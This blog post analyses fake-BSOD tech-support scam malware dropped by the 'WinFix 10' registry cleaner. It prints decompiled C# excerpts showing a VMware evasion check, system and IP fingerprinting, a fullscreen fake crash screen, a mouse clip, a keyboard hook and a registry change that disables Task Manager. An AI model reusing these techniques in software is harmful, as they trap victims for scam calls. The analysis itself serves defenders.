Fake BSOD Malware – New Scam Infection

Recently there has been news of a new piece of malware going around, creating havoc on user’s machines with a fake BSOD screen. The Sysnative team first saw this on Bleeping Computer here (you can see my posts – ring 0).

Fake BSOD-14361d1436936271-fake-bsod-screen-sysnative-staff-room-fake-20bsod-jpg-jpg

The phone number to call for support is “888-991-9974”. Google searching (with cache) shows interesting results:

Call us : (888) 991-9974. Email : support@gboptimizer.com. Address : 121 Newark Ave, Suite 555, Floor 5, Jersey City, NJ – 07302

You can see here in an archive of the website that the old number is indeed there. Yet if you look up the site as of March 2015, there’s a different number. However, it also seems they’ve forgotten to update the old number in a few places on their site, such as here.

With all of that said, I set out to find how to get the specific .exe that was in charge of dropping this particular malware. Malwarebytes found a neat way to drop it, which was using iLivid. I wasn’t aware of iLivid at the time of our investigation, and the fact that it installed our wanted .exe, and I instead discovered WinFix 10 drops it.

Unfortunately, as I’m writing this article, I’ve noticed that the webpage for WinFix has pretty much been killed off by its host. Archive won’t show any reports of it either, so it looks like we won’t be able to access it anymore. In any case, even before the website was killed off, the download function on WinFix’s website didn’t work, so I needed to find out how to get its setup executable. Well, needless to say after digging for a bit, I discovered a fileserver index that holds the setup executable for WinFix, and this worked. The version that dropped ‘SenseIUpdaterN.exe’ for me was “WinFix_WINFIXMK”, as the others didn’t.

Due to the website being killed off by the host, most likely for hosting malware, all of the malicous files stored were of course changed to not contain their original code. For example, ‘SenseIUpdaterN.exe’ is instead filled with preset HTML code from the host, rather than its payload. It was discovered by niemiro that if you change its extension to XML, and load it up in a web browser, you can see a custom 404 page from the host:

Fake BSOD-14934d1438355610-fake-bsod-screen-sysnative-staff-room-ipage-png-png

Taking a look at WinFix’s GUI real quick, we can see it’s essentially your basic fake registry cleaner/scanner that says there are issues with your system when there’s really not. For example, here are a few excerpts from a ~10 minute old clean install:

Fake BSOD-winfix-10-png

Notice my system health is “critical”.

Fake BSOD-winfix10v2-png

For curiousity’s sake, if we do attempt to resolve these “problems”, here’s what happens:

Fake BSOD-winfix10v3-png

Fake BSOD-winfix10v4-png

So this software’s legitmacy is pretty self-explanatory. Overall, I wonder if the WinFix devs are in any relation to the GBOptimizer devs, if not the same people.

Moving onto the analysis, note some important keys below after the installation of WinFix 10. For example, the fake BSOD is consistently “called”/forced by a scheduled task that’s set, which you can see I commented in the code box below:

Keys added: 20
HKLM\SOFTWARE\Microsoft\Tracing\Winfix 10_RASAPI32
HKLM\SOFTWARE\Microsoft\Tracing\Winfix 10_RASMANCS
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Winfix 10 Pro1.0
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{949AC1BE-9B98-4B63-A32A-1AAA44EAB314}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{53A78E81-167C-4C9F-8610-F5E0855D96FE}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E4916F81-B0AC-4C4F-A8DA-835C669486B1}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{53A78E81-167C-4C9F-8610-F5E0855D96FE}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{949AC1BE-9B98-4B63-A32A-1AAA44EAB314}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E4916F81-B0AC-4C4F-A8DA-835C669486B1}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Winfix 10 Auto Start Logon
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Winfix Helper
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{b892d89f-cade-4f10-a61e-5493d54be5ca} // Here's the scheduled task that forces the fake BSOD
HKLM\SOFTWARE\Developerts LLC\Winfix

So what language was it programmed in?

Microsoft Visual C# / Basic .NET

Surprisingly, the malware was written in managed code (.NET). With that said, it’s relatively simple to disassemble/reverse. The first thing to note however is it checks to see if it’s running in a virtual environment (particularly VMware), and if so, the payload won’t execute, and you ultimately won’t experience the fake BSOD.

        public string isVirtualMachineCode0000X01()
            string result;
            foreach (ManagementBaseObject current in new ManagementObjectSearcher("Select * from Win32_ComputerSystem").Get())
                string text = current["Manufacturer"].ToString().ToLower();
                if (text.Contains("microsoft corporation") || text.Contains("vmware"))
                    result = "Yes";
                    return result;
                if (current["Model"] != null)
                    string text2 = current["Model"].ToString().ToLower();
                    if (text2.Contains("microsoft corporation") || text2.Contains("vmware"))
                        result = "Yes";
                        return result;
            result = "No";
            return result;

If no virtual environment is found and the proper argument to continue payload execution is passed, the malware then checks for various sysinfo:

cls_DB900042343242.IPAddress0000X01 = response.ipAddress; // IP address
cls_DB900042343242.CountryName0000X01 = response.countryName; // Country
cls_DB900042343242.CountryCode0000X01 = response.countryCode; // Country code (e.g. USA's code is 1)
cls_DB900042343242.CityName0000X01 = response.cityName; // City
cls_DB900042343242.RegionName0000X01 = response.regionName; // Region
cls_DB900042343242.ZipCode0000X01 = response.zipCode; // Zip code
cls_DB900042343242.TimeZone0000X01 = response.timeZone; // Timezone
cls_DB900042343242.MachineName0000X01 = Environment.MachineName; // Machine name (i.e. your computer's name)
cls_DB900042343242.OSVersion0000X01 = Environment.OSVersion.ToString(); // Prints the Microsoft OS version # to a readable product name string
cls_DB900042343242.ProcessorCount0000X01 = Environment.ProcessorCount.ToString(); // Prints the # of processors in the system
cls_DB900042343242.isVirtualMachine0000X01 = cls_DB900042343242.isVirtualMachineCode0000X01();
cls_DB900042343242.NetworkCode0000X01 = 7;
Settings.Default.X019988FFCB12 = cls_DB900042343242.SP_NewAlert0000X01();

As an example, here’s one of the sysinfo check excerpts regarding IP grabbing:

string arg = new WebClient().DownloadString("https://icanhazip.com");

It uses the WebClient().DownloadString method to download the resource as a string.

If we disassemble the exe and check its resources, we can find a string table with the following contents:

ÎÊï¾   ‘   lSystem.Resources.ResourceReader, mscorlib, Version=,  Culture=neutral,  PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet           PADPADPAâHÀ    ×   l a b e l 1 . T e x t     ëA problem has been  detected and Windows has been shut down to prevent damage to your  computer.


If this is the first time you've seen this error screen, restart your  computer. If this screen appears again, follow these steps:

Check to make sure any new hardware or software is properly installed.  If this is a new installation, ask your hardware or software  manufacturer for any Windows updates you might need.

If problems continue, disable or remove any newly installed hardware.  Disable BIOS memory options such as caching or shadowing. If you need to  use Safe Mode to remove or disable components, restart your computer,  press F8 to select Advanced Startup Options, and then select Safe Mode.

Technical Information:

*** STOP: 0X00000ed (0X80F128D0, 0xc000009c, 0x00000000, 0x0000000)

Beginning dump of physical memory
Physical memory dump complete.
Contact your system administrator or technical support group for further assistance.

More Info : https://msdn.microsoft.com/en-us/library/windows/hardware/ff559278(v=vs.85).aspx

For technical support assistance call : {phone}

The malware “calls” the 0xED bug check (which is really UNMOUNTABLE_BOOT_VOLUME) and prints it as IRQL_NOT_DISPATCH_LEVEL (which is really 0x8). To make matters even more interesting, the malware dev even pointed to the correct MSDN article for the bug check, but failed to put the correct bug check code. Note the following:

For technical support assistance call : {phone}

We can find the string replacement for {phone} in load_number0007x3().

        private void load_number0007x3()
                DataTable dataTable = new cls_DB900042343242
                    NetworkCode0000X01 = 7
                this.label1.Text = this.label1.Text.Replace("{phone}", dataTable.Rows[0]["PhoneNumber"].ToString());
            catch (Exception)
                this.label1.Text = this.label1.Text.Replace("{phone}", "1-800-901-1275 (USA - Canada)");

It’s replacing {phone} with “PhoneNumber”, which is “1-800-901-1275 (USA – Canada)” by using the String.Replace method.

Let’s look further into the fake BSOD with this image:

Note “label1.Txt”. If we go through the code, we stumble upon this:

private void InitializeComponent()

The use of the InitializeComponent() method is interesting to see, as its existence implies we can expect something GUI/art related. InitializeComponent() is used for WFP and Windows’ forms designer, and in this case it was the latter. We can guess that’s our fake BSOD, and we can guess right:

            this.BackColor = Color.DarkBlue; // System-defined color that has an ARGB value of #FF00008B (our fake BSOD color)
            base.ClientSize = new Size(883, 531); // Setting width/height of control area
            base.Controls.Add(this.label1); // label1 is our font for the fake BSOD
            base.FormBorderStyle = FormBorderStyle.None; // Set border style to none
            base.MaximizeBox = false; // No maximize button located in the caption bar
            base.MinimizeBox = false; // No minimize button located in the caption bar
            base.Name = "frm_main"; 
            base.ShowIcon = false; // No icon located in the caption bar
            base.ShowInTaskbar = false; // No taskbar button/icon - also, alt+tabbing for previews will not show it
            base.StartPosition = FormStartPosition.CenterScreen; // At run time of the form, center the form of the current screen
            this.Text = "Form1";
            base.FormClosed += new FormClosedEventHandler(this.frm_main_FormClosed);
            base.Load += new EventHandler(this.frm_main_Load);

Let’s check label1:

            this.label1 = new Label();
            this.label1.BackColor = Color.Transparent; // Set backcolor on the text to transparent so it's just the text
            this.label1.Dock = DockStyle.Fill; // Control's edges are docked to the all edges of its containing control and sized appropriately
            this.label1.Font = new Font("Courier New", 15f, FontStyle.Bold, GraphicsUnit.Point, 0); // Font  is Courier New, 15px, bold
            this.label1.ForeColor = Color.White; // Font color is white
            this.label1.Location = new Point(0, 0);
            this.label1.Name = "label1";
            this.label1.Padding = new Padding(200, 0, 200, 0);
            this.label1.Size = new Size(883, 531);
            this.label1.TabIndex = 1;
            this.label1.Text = componentResourceManager.GetString("label1.Text");
            this.label1.TextAlign = ContentAlignment.MiddleLeft;
            base.AutoScaleDimensions = new SizeF(6f, 13f);
            base.AutoScaleMode = AutoScaleMode.Font;

So how does the fake BSOD inevitably occur?

        private void frm_main_Load(object sender, EventArgs e)
            base.WindowState = FormWindowState.Maximized;
            base.TopMost = true;
            this.KeyboardHook(this, e);

Let’s look into this one by one:


What is this doing?

        private void DisableMouse()
            this.OldRect = Cursor.Clip;
            this.BoundRect = new Rectangle(50, 50, 1, 1);
            Cursor.Clip = this.BoundRect;

The dev created the function DisableMouse() that when called, hides the mouse cursor using the Cursor.Hide method. Not only is it hidden, but Cursor.Clip is used to clip the cursor by drawing a 1×1 rectangle at (50, 50), forcing it to move only in its clipping rectangle bounds.

this.KeyboardHook(this, e);

What is this doing?

Under the main function, we can see:

private const int WH_KEYBOARD_LL = 13;

This tells us somewhere in the code, we’ll find the SetWindowsHookEx function. This function installs an application-defined hook procedure into a hook chain, which allows for various system events to be monitored. Specifically, the parameter the dev used here installs the low-level keyboard input event hook procedure.

Why does the dev do this? Likely just to disable the keyboard.

Something interesting to note is, as a temporary workaround to a hard shutdown, the user can CTRL-ALT-DEL to bring up the menu, and then select ‘log out/sign out’ and re-log/sign back in to avoid the hard shutdown. The reason for this is, despite disabling Task Manager, you cannot disable CTRL-ALT-DEL handling outside of any sort of kernel-level code.


What is this doing?

        public void SetTaskManager(bool enable)
            RegistryKey registryKey =  Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System");
            if (enable && registryKey.GetValue("DisableTaskMgr") != null)
                registryKey.SetValue("DisableTaskMgr", "1");

It disables Task Manager by setting the value “DisableTaskMgr” to 1. I can only presume the dev obviously did this so users cannot bring up Task Manager and inspect the active system processes.

Overall, the malware itself isn’t in-depth nor impressive, however it’s interesting to see malware from a managed code perspective as opposed to the usual kernel-level malware we see nowadays.

Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *